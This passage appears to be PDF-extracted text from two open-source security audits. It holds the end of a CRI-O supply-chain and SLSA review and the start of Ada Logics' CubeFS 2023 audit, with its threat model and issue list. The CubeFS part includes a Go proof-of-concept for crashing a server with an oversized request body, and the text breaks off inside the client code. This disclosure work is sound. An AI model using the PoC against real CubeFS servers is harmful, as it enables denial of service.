business and valuable customer data. In 2020 there has\nbeen a 430% growth in next-generation cyber-attacks actively targeting open-source\nsoftware projects\n1\n—open Source software in components\nin an organization's Software\nSupply Chain. Organizations' build systems, those software components that build software,\nare also under attack. 2020 saw the first prolific supply chain security attack, Sunburst. This\nattack compromised the Solarwinds build system to inject malicious code into their IT\n26\nCRI-O security audit, 2022\nmonitoring system, distributed to customers unbeknownst to Solarwinds. There are many\nentry points in the software supply chain of an organization, and any good defensive strategy\nrequires diligence, multilevel security, and observability of the entirety of the Software supply\nchain.\nSoftware Supply chains and the processes involved can be divided into three categories:\nDevelopment, Build, Run. Development is the process of adding new features, functionality,\ntesting and bug fixes. Before running software, it must be validated and packaged in the\nbuild category. And finally running the software so it is available to end users.\nThese categories can be further divided into links:\n●\nDevelopment - Act of writing software\n●\nSource - Artifact that was directly authored or reviewed by persons\n●\nBuild - Set of process that transform for consumption\n●\nPackage - Source that is published for use\n●\nDependencies - Artifact that is an input to a build process but that is not a source\n●\nDeploy - Set of steps to make Artifact consumable for end users\n●\nRun - Artifacts are available to be consumed by end users\nSoftware developers face threats at each link in the software supply chain. Source threats\nare those that inject software, features, and functionality not intended by the software\nproducer. 
Build threats are those that involve manipulating the source during build time, such\nas Sunburst attacks. The final category is Dependency threats, Attacker adds a dependency\nand then later changes the dependency to add malicious behavior.\n27\nCRI-O security audit, 2022\nGoals\nA deliverable from Chainguard that represents their findings and perspective about the\ncurrent release process including a prioritized list of gaps that they believe should be\naddressed in the short term, this document. The document will serve as an appendix to the\noverall audit report, therefore, the codebase itself and the running environment is out of\nscope of this assessment.\nInterviews & Engagement Model\nReview of the release tooling was conducted by inspecting the open-source GitHub\nrepository. A final Q&A session was held on slack on May 9th, 2022\nFindings\nBuild\nThe CRI-O build system runs at every commit, producing the same bundles for arm64 and\nam64 architectures containing config files, plugins, binaries and other files that tagged\nreleases publish.\nMost of CRI-O build system run in GitHub actions, with a fairly high degree of automation,\nespecially given the number of active contributors to the project. The release process of the\nstatic binaries performs all critical steps under automation, while the last non-critical bits\n(patching the release notes, for example) are still manual. Building the system packages is\nstill a manual process which is more of a concern, but given the overall automation level of\nthe project, automating the build of these artifacts should be easily achievable.\nBase builds are reproducible, yet some artifacts like os packages are signed which\nintroduces entropy, leading to varying output.\nBuild automation is kept in GitHub Actions workflows and scripts. Hence, the infrastructure\nthat runs the build automation is not managed by the project itself. The Actions environment\nprovides isolation from run to run\nStep to step metadata is not signed, nor are artifacts built by the release process provided\nfor download. Prebuilt OS Packages are signed for their respective packaging system.\nSource Code\nThe project’s source code is tracked in git and revision history is kept indefinitely in GitHub.\nThe project has a contributions guide. The guide establishes roles and a two-reviewer\nrequirement for all merges. Signed commits are required to contribute to the project.\n28\nCRI-O security audit, 2022\nDeploy\nSigned build metadata is not provided. User validation of artifacts is limited to integrity check\nvia checksum files.\nMaterial Verification\nReleases are not described with a Software Bill of Materials, no provenance attestations\nrecording the release process steps are produced either. The project uses FOSSA to keep\ntrack of dependencies and licensing.\nSLSA Overview\nSLSA is a set of standards and technical controls you can adopt to improve artifact integrity\nand build towards completely resilient systems. 
It’s not a single tool, but a step-by-step\noutline to prevent artifacts from being tampered with and tampered artifacts from being used,\nand at the higher levels, hardening up the platforms that make up a supply chain.\n4\nSLSA Findings\nDerived from the findings detailed below, CRI-O is near SLSA Level 1 compliance.\nProducing the necessary provenance metadata would set the release process ready to start\nimplementing digital singatures of its artifacts and metadata, ensuring they can’t be\ntampered with,\nSLSA Assessment Table\nSource Requirements\n1\n2\n3\n4\nStatus/Justification\nVersion controlled\nEvery change to the source is tracked in a\nversion control system that meets the\nfollowing requirements\nO\n✓\n✓\n✓\nVerified history\nEvery change in the revision’s history has at\nleast one strongly authenticated actor\nidentity (author, uploader, reviewer, etc.) and\ntimestamp.\n✓\n✓\nRetained indefinitely\nThe revision and its change history are\npreserved indefinitely and cannot be deleted,\nexcept when subject to an established and\ntransparent policy for obliteration, such as a\nlegal or policy requirement.\n1\n8\nm\no\n✓\nGit tree remains unaltered. Source code\nof the build is archived\nTwo-person reviewed\nEvery change in the revision’s history was\nagreed to by two trusted persons prior to\nsubmission, and both of these trusted\npersons were strongly authenticated.\n(Exceptions from Verified History apply here\nas well.)\n✓\n2 person requirement specified in docs\n29\nCRI-O security audit, 2022\nBuild requirements\n1\n2\n3\n4\nScripted build\nAll build steps were fully defined in some sort\nof “build script”. The only manual command,\nif any, was to invoke the build script.\nStatic builds are automated but building\nsystem packages is still a “semi manual”\nprocess\nBuild service\nAll build steps ran using some build service,\nnot on a developer’s workstation.\nStatic builds are automated but building\nsystem packages is still a “semi manual”\nprocess\nBuild as code\nThe build definition and configuration is\ndefined in source control and is executed by\nthe build service.\n✓\n✓\nYes, workflows executed in GitHub\nActions\nEphemeral\nenvironment\nThe build service ensured that the build\nsteps ran in an ephemeral environment,\nsuch as a container or VM, provisioned\nsolely for this build, and not reused from a\nprior build.\n✓\n✓\nBuild environment is created/destroyed by\nGitHub Actions\nIsolated\nThe build service ensured that the build\nsteps ran in an isolated environment free of\ninfluence from other build instances, whether\nprior or concurrent.\n✓\n✓\nBuild process cannot clash with other\nprocesses\nParameterless\nThe build output cannot be affected by user\nparameters other than the build entry point\nand the top-level source location. In other\nwords, the build is fully defined through the\nbuild script and nothing else.\n✓\nHermetic\nAll transitive build steps, sources, and\ndependencies were fully declared up front\nwith immutable references, and the build\nsteps ran with no network access.\n✓\nReproducible\nRe-running the build steps with identical\ninput artifacts results in bit-for-bit identical\noutput. Builds that cannot meet this MUST\nprovide a justification why the build cannot\nbe made reproducible.\nO\nYes, for static builds. Signed system\npackages cannot be reproducible\nProvenance\n1\n2\n3\n4\nAvailable\nThe provenance is available to the consumer\nin a format that the consumer accepts. 
The\nformat SHOULD be in-toto SLSA\nProvenance, but another format MAY be\nused if both producer and consumer agree\nand it meets all the other requirements.\n✓\n✓\n✓\n✓\nNo provenance info exists yet\nAuthenticated\nThe provenance’s authenticity and integrity\ncan be verified by the consumer. This\nSHOULD be through a digital signature from\na private key accessible only to the service\ngenerating the provenance.\n✓\n✓\n✓\nService generated\nThe data in the provenance MUST be\nobtained from the build service (either\n✓\n✓\n✓\n30\nCRI-O security audit, 2022\nbecause the generator is the build service or\nbecause the provenance generator reads\nthe data directly from the build service).\nNon-falsifiable\nProvenance cannot be falsified by the build\nservice’s users.\n✓\n✓\nDependencies\ncomplete\nProvenance records all build dependencies\nthat were available while running the build\nsteps.\n✓\nContents of\nProvenance\n1\n2\n3\n4\nIdentifies artifact\nThe provenance MUST identify the output\nartifact via at least one cryptographic hash.\nNo provenance data exists yet\nIdentifies builder\nThe provenance identifies the entity that\nperformed the build and generated the\nprovenance. This represents the entity that\nthe consumer must trust.\nIdentifies build\ninstructions\nThe provenance identifies the top-level\ninstructions used to execute the build. The\nidentified instructions SHOULD be at the\nhighest level available to the build\nIdentifies source code\nThe provenance identifies the repository\norigin(s) for the source code used in the\nbuild.\nIdentifies entry point\nThe provenance identifies the “entry point” of\nthe build definition (see build-as-code) used\nto drive the build including what source repo\nthe configuration was read from.\n✓\n✓\nIncludes all build\nparameters\nThe provenance includes all build\nparameters under a user’s control. See\nParameterless for details. (At L3, the\nparameters must be listed; at L4, they must\nbe empty.)\n✓\n✓\nIncludes all transitive\ndependencies\nThe provenance includes all transitive\ndependencies listed in Dependencies\nComplete.\nIncludes reproducible\ninfo\nThe provenance includes a boolean\nindicating whether build is intended to be\nreproducible and, if so, all information\nnecessary to reproduce the build. See\nReproducible for more details.\nIncludes metadata\nThe provenance includes metadata to aid\ndebugging and investigations. This SHOULD\nat least include start and end timestamps\nand a permalink to debug logs.\nO\nO\nO\nO\nCommon\nrequirements\n1\n2\n3\n4\n31\nCRI-O security audit, 2022\nSecurity\nThe system meets some TBD baseline\nsecurity standard to prevent compromise.\n(Patching, vulnerability scanning, user\nisolation, transport security, secure boot,\nmachine identity, etc. Perhaps NIST 800-53\nor a subset thereof.)\n✓\nNeeds separate assessment. shared\nresponsibility model inherits some\ncompliance but our operation needs to be\nevaluated.\nAccess\nAll physical and remote access must be rare,\nlogged, and gated behind multi-party\napproval.\n✓\nNo remote access (GH Actions based)\nSuperusers\nOnly a small number of platform admins may\noverride the guarantees listed here. Doing so\nMUST require approval of a second platform\nadmin.\n✓\nRecommendations and Remediations\nThe CRI-O release process has a good degree of automation and is free of legacy platforms\nand code, setting the project in a good position to build features to harden builds and\nartifacts. 
SLSA compliance is within reach\nDocument the Release Process, Draft Policy\nDesignation\nSSCOBSERVE\nRisk\nLack of documentation and policies into the \nrelease process may result in time and \neffort to remediate incident reports and \nultimately code.\nRecommendation\n●\nCreate documentation of the release \nprocess \n●\nDraft vulnerability policy delineating \nacceptable risk levels \n●\nDraft 3rd party components policy, \ndetailing acceptable dependencies, \nlicensing, etc\nWhere - Development, Build, Run\nAll\nPrioritisation\nP3\n32\nCRI-O security audit, 2022\nSystem Generated Provenance and SBOM\nDesignation\nARTINT\nRisk\nResponding to 3rd party vulnerabilities or \nbuild system compromises could result in \nunnecessary burden and slow response \ntime because of lacking inventory and \ninformation about the CI runs. Scanning the \ncode for vulnerabilities in dependencies and \nattaching the results as signed attestations \ncan provide assurances to users and may \nblock releases containing vulnerabilities.\nRecommendation\nAttach provenance data to artifacts:\nWe recommend that the minimum \nprovenance data to have: \n●\nSBOM \n●\nSLSA Provenance attestation \n●\nVulnerability scan reports\nProvenance data can be generated at build \ntime, but not necessarily all at the same \ntime. For example, SBOM can be \ngenerated at build time, and at a later time \nvulnerability analysis may be attached.\nWe also recommend that provenance data \nbe signed to comply with SLSA 3 \n(non-falsifiable). Project\nSigstore\noffers \nfacilities to sign/attach-and-sign/verify \nprovenance data.\nPush towards SLSA compliance, all the way to Level 3\nDesignation\nSLSA\nRisk\nThe level of automation of the project’s \nbuild systems puts it in a good position to \nstart implementing SLSA compliance..\nRecommendation \n●\nGithub Actions has proven to run \nSLSA 3 Workloads \n●\nNon falsifiable SLSA provenance \nusing GitHub workflows \n●\nAchieving SLSA 3+ on GitHub: \nReusable Workflows and OIDC\n33\nCRI-O security audit, 2022\n●\nKubernetes workloads to run \nephemeral Github actions\nWhere - Development, Build, Run\nBuild\nPrioritisation\nP3\nAutomate Package Builds\nDesignation\nOSSPM\nRisk\nCRI-O releases system packages for Linux \ndistributions but these artifacts are not built \nby the automation. An attacker could \ncompromise systems where these \npackages are built. 
Securing the package \nbuilds in an automated system should be \npriority one\nRecommendation\n●\nReview Sigstore integrations with\nPackage maintainers.\nLots of\ndetails, more targeted at repository\noperators\n●\nReview the\nopenssf wg survey\nwhich has a lot of practices for\npackage maintainers\n●\nBecome involved in the OpenSSF\nWorking Group to help drive and\nunderstand the current security\navailable to package maintainers\n●\nImplement and/or continue a review\nprocess for access controls around\npackage managers\nWhere - Development, Build, Run\nBuild\nPrioritisation\nP0\n34\nCRI-O security audit, 2022\nSources\n1.\nSonatype 2020 State of Software Supply Chain\nhttps://www.sonatype.com/resources/white-paper-state-of-the-software-supply-chain- \n2020 \n2.\nInside a Targeted Point-of-Sale Data Breach \nhttps://krebsonsecurity.com/wp-content/uploads/2014/01/Inside-a-Targeted-Point-of- \nSale-Data-Breach.pdf \n3.\n10 real-world stories of how we’ve compromised CI/CD pipelines \nhttps://research.nccgroup.com/2022/01/13/10-real-world-stories-of-how-weve-compr \nomised-ci-cd-pipelines/ \n4.\nSLSA Supply Chain Threats\nhttps://slsa.dev/spec/v0.1/#supply-chain-threats \n5.\nWhat an SBOM Can Do for You \n6.\nExecutive Order on Improving the Nation’s Cybersecurity \n7.\nNIST Secure Software Development Framework (SSDF) [PDF]\n35\n" } ]
{ "category": "Runtime", "file_name": "CubeFS-security-audit-2023-report.pdf", "project_name": "CubeFS", "subcategory": "Cloud Native Storage" }
[ { "data": "CubeFS Security\nAudit\nIn collaboration with the CubeFS project maintainers, The Linux Foundation and the\nOpen Source Technology Improvement Fund\nPrepared by\nAdam Korczynski, Ada Logics\nDavid Korczynski, Ada Logics\nReport version: 1.0\nPublished: 2nd January 2024\nThis r\neport is licensed under Creative Commons 4.0 (CC BY 4.0)\nThis page has intentionally been le\u0000 blank\nCubeFS 2023 Security Audit\n2\nAda Logics LtdTable of Contents\nExecutive summary 4\nProject scope 6\nThreat model 7\nSLSA review 11\nIssues found 12\nCubeFS 2023 Security Audit\n3\nAda Logics LtdExecutive summary\nIn the fall of 2023, Ada Logics conducted a security audit of CubeFS in a coordinated\ncollaboration between Ada Logics, CubeFS, OSTIF and the CNCF. The CNCF funded the work.\nThe security audit was a holistic security audit with the following goals:\n1. Assess and formalize a threat model for CubeFS highlighting entrypoints, risks and at-risk\ncomponents.\n2. Review the CubeFS codebase for security vulnerabilities of any severity.\n3. Review CubeFS's supply-chain maturity against SLSA.\nTo formalize the threat model, Ada Logics relied on three sources of information: 1) CubeFS'so\u0000icial documentation, 2) the CubeFS source tree and 3) feedback from the CubeFS\nmaintainers. The manual review was performed against the threat model to allow the auditors\nto consider trust levels and threat actors as they were reviewing the code.\nThe report contains all issues found from both the threat modelling and manual code audit\nexercises. Five of these issues were exploitable by threat actors identified during the threat\nmodelling, and these issues were assigned the following CVE's:\nIssue CVECVE\nseveritiy\nAuthenticated users can crash the CubeFS servers with\nmaliciously cra\u0000 ed requestsCVE-2023-\n46738Moderate\nTiming attack can leak user passwordsCVE-2023-\n46739Moderate\nInsecure random string generator used for sensitive dataCVE-2023-\n46740Moderate\nCubeFS leaks magic secret key when starting Blobstore access\nserviceCVE-2023-\n46741Moderate\nCubeFS leaks users key in logsCVE-2023-\n46742Moderate\nAda Logics disclosed these findings responsibly to CubeFS through CubeFS's public Github\nSecurity Advisory disclosure channels. The CubeFS security response team responded to the\ndisclosures with fixes in a timely manner and before the audit had been completed.\nThe SLSA review found that CubeFS scores low because it does not include provenance for\nreleases. Ada Logics included practical steps for achieving SLSA Level 3 compliance.\nCubeFS 2023 Security Audit\n4\nAda Logics LtdStrategic recommendations\nIn this section, we include our strategic recommendations for CubeFS to maintain a secure\nproject moving forward. Several points in this section are reflected in \"Found Issues\" or other\nparts of the report, whereas some are only included here.\nSupply-Chain Security\nCubeFS has undoubtedly included supply-chain security in its ongoing work. For example,CubeFS has adopted Scorecard, which considers several di\u0000 erent aspects of supply-chain\nsecurity risks in an automated manner. Nonetheless, Supply-chain Security is an area where\nCubeFS can improve its ongoing work. The audit found that releases are not signed and do not\ninclude provenance, which makes consumers vulnerable to known supply-chain risks. We have\nincluded practical steps to take to add this to releases. 
While CubeFS has integrated the\nScorecard Github Action, CubeFS currently scores a 6,5 Scorecard score, which leaves room forimprovement. Open and closed-sourced so\u0000ware ecosystems are seeing an increase in supply-\nchain attacks and their sophistication, with major recent attacks having had their first\ncompromise in the so\u0000ware development lifecycle rather than a\u0000 er deployment.\nStatic analysis\nCubeFS uses automated SAST in its development pipeline however limited to only CodeQL for\nsecurity tooling. During the audit, Ada Logics tested CubeFS with other SAST tools, which found\ntrue positives in the CubeFS code base. We recommend adding the GoSec and Semgrep tools as\nwellm and add ignore directives for false positives.\nSecurity-relevant documentation\nCubeFS has good documentation but lacks a dedicated security-best-practices section to help\nusers deploy a security-hardened CubeFS instance. We recommend adding and maintaining\nthis to ensure users can consume CubeFS in a secure manner and avoid security issues arising\nfrom misconfiguration.\nDuring the security audit, the CubeFS team added a security-best-practices section to theo\u0000icial CubeFS documentation which is available here:\nhttps://cubefs.io/docs/master/maintenance/security_practice.html\nCubeFS 2023 Security Audit\n5\nAda Logics LtdProject Scope\nThe following Ada Logics auditors carried out the audit and prepared the report.\nName Title Email\nAdam Korczynski Security Engineer, Ada Logics Adam@adalogics.com\nDavid Korczynski Security Researcher, Ada Logics David@adalogics.com\nThe following CubeFS team members were part of the audit.\nName Title Email\nLeon Chang maintainer changliang@oppo.com\nXiaochun He maintainer hexiaochun@oppo.com\nBaijiaruo maintainer huyao2@oppo.com\nLei Zhang maintainer zhanglei12@oppo.com\nThe following OSTIF members were part of the audit.\nName Title Email\nDerek Zimmer Executive Director, OSTIF Derek@ostif.org\nAmir Montazery Managing Director, OSTIF Amir@ostif.org\nHelen Woeste Project coordinator, OSTIF Helen@ostif.org\nCubeFS 2023 Security Audit\n6\nAda Logics LtdThreat model\nIn this part, we look at CubeFS's threat model. We have used open-source materials to\nformalize the threat model including mainly from documentation produced by the CubeFS\necosystem, recorded talks, presentations and third-party documentation.\nCubeFS is a cloud-native data storage infrastructure o\u0000 en used on top of databases, machine-\nlearning platforms and applications deployed on top of Kubernetes. It supports multiple access\nprotocols like S3, POSIX and HDFS with flexibility for consumers using multiple protocols in the\nsame deployment.\nCubeFS has four main components: 1) A metadata subsystem, 2) a data subsystem, 3) a\nresource management node also called \"Master\" and 4) an Object Subsystem. Below, we\nenumerate the components.Metadata subsystem\nThe Metadata subsystem runs the MetaNode which stores all file metadata in the cluster. In\nKubernetes, this is deployed as a DaemonSet K8s resource.\nData subsystem\nThe data subsystem is known internally in CubeFS as DataNode and handles the actual storing of\nfile data. It mounts a large amount of disk space to store file data. When using CubeFS with\nKubernetes, DataNode is deployed as a DaemonSet .\nResource management\nThe resource management component is called Master and is responsible for managing\nresources and maintaining the metadata of the whole cluster. 
When deploying CubeFS on\nKubernetes, the Master Node is deployed as a StatefulSet K8s resource.\nObject Subsystem\nThis component runs ObjectNodes and acts as an interface between di\u0000 erent protocols - HDFS,\nPOSIX and S3 - such that CubeFS works as the underlying data store, and the user can operate\nCubeFS by way of either or several of these protocols. The Object Subsystem is also called the\nObject Gateway internally in the CubeFS ecosystem.\nIn addition to the four core components, CubeFS implements an AuthNode which handles\nauthentication and authorization in a CubeFS deployment.\nCubeFS is meant to be deployed in such a manner that it is available to users of varying\npermission levels. This means that at a high level, CubeFS must be resistant to malicious cluster\nusers who have been granted access. For example, if an organization grants access to an\nemployee who gets convinced by a competitor to steal or corrupt data, the CubeFS devops\nteam must know the impact this employee has for risk mitigation and impact remediation\npurposes. User permissions in CubeFS should start at the lowest and increase with the\npermissions that CubeFS admins intend to add to the user.\nThere are at least two security-relevant implications for CubeFS's architectural and permission\ndesign:\nCubeFS 2023 Security Audit\n7\nAda Logics Ltd1. Users should not be able to achieve permissions they have not been granted. A permission\nshould not imply another permission, whether intended or not. At this level, we are\nconsidering defined permissions that are not assigned to a user. This part of CubeFS's\nsecurity model distinguishes between privileges at a granular level.\n2. The second implication is the distinction between root and non-root permissions. CubeFS\nshould accept a full cluster deletion by the cluster admin; it is not a security breach if the\ncluster admin or CubeFS admin can take down the entire cluster or cause any other harm\nto any part of CubeFS. There is an implied list of non-permitted actions that users shouldnot be allowed to perform. These are general security risks that pertain to other so\u0000ware\napplications, such as Denial-of-Service attacks, stealing data, remote code execution,\ncorruption of data and other general threats.\nMost commonly, CubeFS is not exposed directly to the internet but will be available to services\ninside the cluster to which it is deployed. A CubeFS deployment will have multiple client nodes\nthat include a client container, which is intended to communicate with the remaining CubeFS\ncomponents. Communication between components happens via HTTP(S); Each component\nexposes a web server to the cluster. As such, threats are likely to come from users who already\nhave a position in the cluster. This position can be through a legitimate use cage - a user that\nshould have access and has been granted so by the CubeFS admin, or it could be through a\nthreat actor who has already escalated privileges and who seeks to further advance their\nposition inside the cluster. In the former scenario, we have covered the expectations above,\nwhich we can sum up as such: If a legitimate user turns malicious, the CubeFS admin should\nknow what their impact is and should be in control of reducing any permissions that the user\nhas. In other words, what the CubeFS admin expects the user can do represents the user's\nprivileges pricisely. 
For the latter, CubeFS should reduce the ease with which an attacker can\nfurther escalate privileges inside the cluster.\nCubeFS 2023 Security Audit\n8\nAda Logics LtdTrust boundaries\nIn this section, we identify the trust boundaries of a CubeFS deployment. Below, we include a\ntrust-flow diagram of an out-of-the-box CubeFS deployment:\nTypically, a CubeFS deployment will be deployed alongside an internet-facing application in the\ncluster with which users communicate. When tra\u0000ic enters the cluster, it crosses a trust\nboundary and flows low to high in the direction from the internet to the cluster. This trust\nboundary could also exist between the user-facing application and the CubeFS client nodes,\ndepending on the specific use case. The reason for this is that the user-facing application coulddo its own validation and sanitization. From the user-facing application, tra\u0000ic flows to the\nCubeFS client nodes. These authenticate the request before processing it, and the tra\u0000ic\ncrosses another trust boundary when being authenticated. At this point, trust flows low to high\nin the direction from the CubeFS client nodes to the authenticator. Trust remains high until\nCubeFS responds to the user external to the cluster.\nCubeFS 2023 Security Audit\n9\nAda Logics LtdThreat actors\nA threat actor is an individual or group that intentionally attempts to exploit vulnerabilities,\ndeploy malicious code, or compromise or disrupt a CubeFS deployment, o\u0000 en for financial\ngain, espionage, or sabotage. A threat actor is the personification of a possible attacker of\nsecurity issues. Each threat actor has a level of trust tied to them, and matching one or several\nthreat actors with CubeFS's threat model helps identify the high-level security risk. We identify\nthe following threat actors for CubeFS. A threat actor can assume multiple profiles from the\ntable below; for example, a fully untrusted user can also be a contributor to a 3rd-party library\nused by CubeFS.Threat Actor DescriptionLevel\nof trust\nCode contributor to\nCubeFSPerson or group of people that contribute code to\nCubeFS's upstream repositoryNone\nCode contributor to\nCubeFS's 3rd-party\ndependenciesPerson or group of people that contribute code to\nCubeFS's 3rd-party dependenciesNone\nExternal users of ingress\ncluster entrypointsUsers that interact with internet-facing applications in the\ncluster. The purpose of these entrypoints will for the most\npart be to enable use of CubeFS.None\nOutside actor with\nposition in clusterA person or group of people with no granted privileges\nthat have escalated privileges by using a weakness in\nCubeFS, its underlying platform or a 3rd-party\ndependency.None\nCluster userCluster users with non-root privileges. These are users of\nthe CubeFS deployment.Low to\nhigh\nInfrastructure\ncontributorsThese are users that maintain applications and\ninfrastructure running on the cluster. This threat actor is\nnot a user of CubeFS themselves, but they facilitate access\nfor other users.Low\nCluster admin Users with sudo permissions over the cluster and CubeFS. Full\nCubeFS 2023 Security Audit\n10\nAda Logics LtdSLSA review\nADA Logics carried out a SLSA review of CubeFS. SLSA ( https://github.com/slsa.dev) is a\nframework for assessing the security practices of a given so\u0000ware project with a focus on\nmitigating supply-chain risk. 
SLSA emphasises tamper resistance of artifacts as well as\nephemerality of the build and release cycle.\nSLSA mitigates a series of attack vectors in the so\u0000ware development life cycle (SDLC), all of\nwhich have seen real-world examples of successful attacks against open-source and proprietary\nso\u0000ware.\nBelow, we include a diagram made by the SLSA illustrating the attack surface of the SDLC.\nEach of the red markers demonstrate di\u0000 erent areas of possible compromise that could allow\nattackers to tamper with the artifact that the consumer invokes at the end of the SDLC.\nSLSA splits its assessment criteria into 4 increasingly demanding levels. The higher the level of\ncompliance, the higher tamper-resistance the project ensures its consumers.\nAn essential part of ensuring tamper resistance is to include a verifiable provenance statement\nwith releases. SLSA provides a framework for creating this automatically when building release\nartifacts (https://github.com/slsa-framework/slsa-github-generator) which we recommend\nCubeFS adopts. Building artifacts by way of the slsa-github-generator will produce SLSA level 3\ncompliant provenance. CubeFS can adopt the slsa-github-generator by adding a Github\nworkflow that invokes the SLSA builder.\nComplying with SLSA level 3 reflects a high standard of supply-chain mitigation, and CubeFS\nconsumers should not be discouraged from a low level of compliance. We recommend that the\nCubeFS community tracks ongoing work for adopting the slsa-github-generator project and\nworking on this in the open. It is far from all open-source projects that have achieved level 3\ncompliance at this part of SLSA open-source lifetime.\nCubeFS currently is at Level 0 by the SLSA specification.\nCubeFS 2023 Security Audit\n11\nAda Logics LtdIssues found\nAda Logics found 12 issues during the audit. The list includes all issues found by way of manual\nauditing and fuzzing. Ada Logics uses a scoring system that considers impact and ease of\nexploitation. This is di\u0000 erent from the CVSS scoring system, and there may be discrepancies\nbetween the severity assigned by Ada Logics and the severity resulting from a CVSS calculation.\n# Title Status Severity\n1Authenticated users can crash the CubeFS servers with\nmaliciously cra\u0000 ed requestsFixed Moderate\n2CubeFS leaks magic secret key when starting Blobstore\naccess serviceFixed Moderate\n3 CubeFS leaks users key in logs Fixed Moderate\n4 Insecure cryptographic primitive used for sensitive data Fixed Moderate\n5 Insecure random string generator used for sensitive data Fixed Moderate\n6 Lack of security-best-practices documentation Fixed Moderate\n7 Possible deadlocks Fixed Moderate\n8 Possible nil-dereference from unmarshalling double pointer Fixed Low\n9 Potential Slowloris attacks Fixed Low\n10 Releases are not signed Fixed Moderate\n11 Security Disclosure Email Does Not Work Fixed Low\n12 Timing attack can leak user passwords Fixed Moderate\nCubeFS 2023 Security Audit\n12\nAda Logics LtdAuthenticated users can crash the CubeFS servers with\nmaliciously cra \u0000ed requests\nSeverity: Moderate\nStatus: Fixed\nId: ADA-CUBEFS-NKbh4NJK\nComponent: ObjectNode\nThe root cause is that when CubeFS reads the body of incoming requests, it reads it entirely into\nmemory and without an upper boundary. As such, an attacker can cra\u0000 an HTTP that contains a\nlarge body and exhausts memory of the machine, which results in crashing the server.\nDetails\nThe issue exists across multiple CubeFS components. 
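Before looking at a concrete handler, here is a minimal sketch of the kind of upper bound that prevents this class of issue. The handler path and the 10 MiB limit are hypothetical choices for illustration, not CubeFS's actual fix; the point is that http.MaxBytesReader caps how much of the body io.ReadAll can pull into memory.

```go
package main

import (
	"fmt"
	"io"
	"net/http"
)

// maxBodyBytes is an illustrative limit; a real service would size it to the
// largest legitimate request it expects for this endpoint.
const maxBodyBytes = 10 << 20 // 10 MiB

func deleteObjectsCapped(w http.ResponseWriter, r *http.Request) {
	// Wrap the body before reading it: MaxBytesReader makes reads fail once
	// more than maxBodyBytes have been consumed, so an oversized body can no
	// longer exhaust the server's memory.
	r.Body = http.MaxBytesReader(w, r.Body, maxBodyBytes)

	body, err := io.ReadAll(r.Body)
	if err != nil {
		http.Error(w, "request body too large or unreadable", http.StatusRequestEntityTooLarge)
		return
	}
	fmt.Fprintf(w, "read %d bytes\n", len(body))
}

func main() {
	http.HandleFunc("/deleteObjects", deleteObjectsCapped)
	_ = http.ListenAndServe(":8080", nil)
}
```

Performing the ACL check before reading the body would shrink the attack surface further, since the handler shown below runs its permission check only after the read.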
We have not made an exhaustive list and\nwill follow up with that. For now, we exemplify the issue with the deleteObjectsHandler of the\nobjectnode component. This handler reads the body of the incoming request entirely into\nmemory on line 561 below:\nhttps://github.com/cubefs/cubefs/blob/45442918591d25e7ab555469df384df468df5dbc/objectnode/api_handler_object.go#L5\n32C22-L567\n532func (o *ObjectNode) deleteObjectsHandler (w http.ResponseWriter, r *http.Request) {\n533 var (\n534 err error\n535 errorCode *ErrorCode\n536 )\n537 defer func() {\n538 o.errorResponse (w, r, err, errorCode)\n539 }()\n540\n541 var param = ParseRequestParam (r)\n542 if param.Bucket() == \"\" {\n543 errorCode = InvalidBucketName\n544 return\n545 }\n546\n547 var vol *Volume\n548 if vol, err = o. getVol(param.Bucket()); err != nil {\n549 log.LogErrorf (\"deleteObjectsHandler: load volume fail: requestID(%v) \nvolume(%v) err(%v)\" ,\n550 GetRequestID (r), param. Bucket(), err)\n551 return\n552 }\n553\n554 requestMD5 := r.Header. Get(ContentMD5)\n555 if requestMD5 == \"\" {\n556 errorCode = MissingContentMD5\n557 return\n558 }\n559\n560 var bytes [] byte\n561 bytes, err = ioutil. ReadAll(r.Body)\n562 if err != nil {\n563 log.LogErrorf (\"deleteObjectsHandler: read request body fail: \nrequestID(%v) volume(%v) err(%v)\" ,\n564 GetRequestID (r), param. Bucket(), err)\n565 errorCode = UnexpectedContent\n566 return\n567 }\nIn this case, a user does not require permission to delete objects since the ACL check is done\na\u0000er reading the request body.\nPoC\nCubeFS 2023 Security Audit\n13\nAda Logics LtdWe include two programs to reproduce this issue. Warning: save all work before running this\nPoC, including work in browser tabs.\nThe first program is a server that represents the deleteObjectsHandler . We have stripped\nunrelated parts of the function body that the HTTP request can easily pass legitimately. Start up\nthis server by creating the following go module and run it with go run main.go :\n1package main\n2\n3import (\n4 \"fmt\"\n5 \"io/ioutil\"\n6 \"net/http\"\n7)\n8\n9func main() {\n10 http.HandleFunc (\"/deleteObjects\" , func(w http.ResponseWriter, r \n*http.Request) {\n11 // Here CubeFS gets the params. We skip that since an authenticated \nuser can get past that.\n12\n13 // Here CubeFS gets the volume. The user can pass a Bucket identifier \nthat will not return an error to get past that.\n14\n15 // Here CubeFS gets the requestMD5. The user can include any value in \nthe header to get past that.\n16\n17 // At this point, the handler invokes the vulnerable line\n18 fmt.Println(\"Got request\" )\n19 _, err := ioutil. ReadAll(r.Body)\n20 if err != nil {\n21 return\n22 }\n23 fmt.Println(\"Finished reading body\" )\n24 })\n25\n26 fmt.Printf(\"Starting server at port 8080\\n\" )\n27 if err := http. ListenAndServe (\":8080\", nil); err != nil {\n28 panic(err)\n29 }\n30}\nYou should see Starting server at port 8080 in the terminal when starting this program.\nThe next program is the client. This program represents the malicious user who cra \u0000s a request\nwith a large body and sends it to the server. Depending on the system used when running this\nprogram, it may be necessary to reduce or increase the size of the body. Create the followingmain.go in another module and run it with go run main.go\n1package main\n2\n3import (\n4 \"io\"\n5 \"strings\"\n6 \"net/http\"\n7)\n8\n9func main() {\n10 req := maliciousRequest ()\n11 \n12 _, err := http.DefaultClient. 
